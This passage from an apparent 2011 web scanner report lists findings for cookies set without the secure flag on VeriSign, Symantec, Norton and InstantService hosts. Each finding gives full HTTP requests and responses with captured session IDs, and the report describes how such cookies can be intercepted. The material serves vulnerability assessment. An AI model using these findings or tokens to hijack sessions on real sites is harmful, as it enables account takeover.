https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
https://trust-center.verisign.com/rcm/verisign/style/brand.css
https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
https://trust-center.verisign.com/rcm/verisign/style/module.css
https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
https://www.verisign.com/assets/visual-sciences/vip/zig.js
https://www4.symantec.com/Vrt/wl

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://admin.instantservice.com/Customer previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/Customer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:36:51 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8

6.2. https://admin.instantservice.com/links/5851/14753 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:49 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5905
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales U
...[SNIP]...

6.3. https://admin.instantservice.com/links/5851/16144 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5858
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales A
...[SNIP]...

6.4. https://admin.instantservice.com/links/5851/16145 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5853
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales A
...[SNIP]...

6.5. https://admin.instantservice.com/links/5851/39897 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5946
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>VRSN Sales U
...[SNIP]...

6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://onlinefamily.norton.com
Path:	/familysafety/loginStart.fs

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
formVersion=1315604755623; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:55 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/
Set-Cookie: formVersion=1315604755623; Path=/
Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 37906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...

6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/outsideSearch

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.8. https://securitycenter.verisign.com/celp/enroll/retail previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/retail

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:43:53 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.9. https://securitycenter.verisign.com/celp/enroll/upsell previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://securitycenter.verisign.com
Path:	/celp/enroll/upsell

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:18 GMT
Content-type: text/html;charset=UTF-8
Location: https://securitycenter.verisign.com/celp/enroll/retail
Set-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
Content-Length: 303

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://securitycenter.verisign.co
...[SNIP]...

6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://onlinefamily.norton.com
Path:	/familysafety/basicpremium.fs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

formVersion=1315604730862; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:30 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/
Set-Cookie: formVersion=1315604730862; Path=/
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 41316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Web Moni
...[SNIP]...

6.11. https://renewals.symantec.com/renewals/application previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://renewals.symantec.com
Path:	/renewals/application

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />

<!-- BEGIN
...[SNIP]...

6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.ch
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ssl-certificate-center.verisign.com
Path:	/process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.17. https://trust-center.verisign.ch/process/retail/console_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.18. https://trust-center.verisign.ch/process/retail/trust_initial previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.ch
Path:	/process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

6.19. https://trust-center.verisign.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
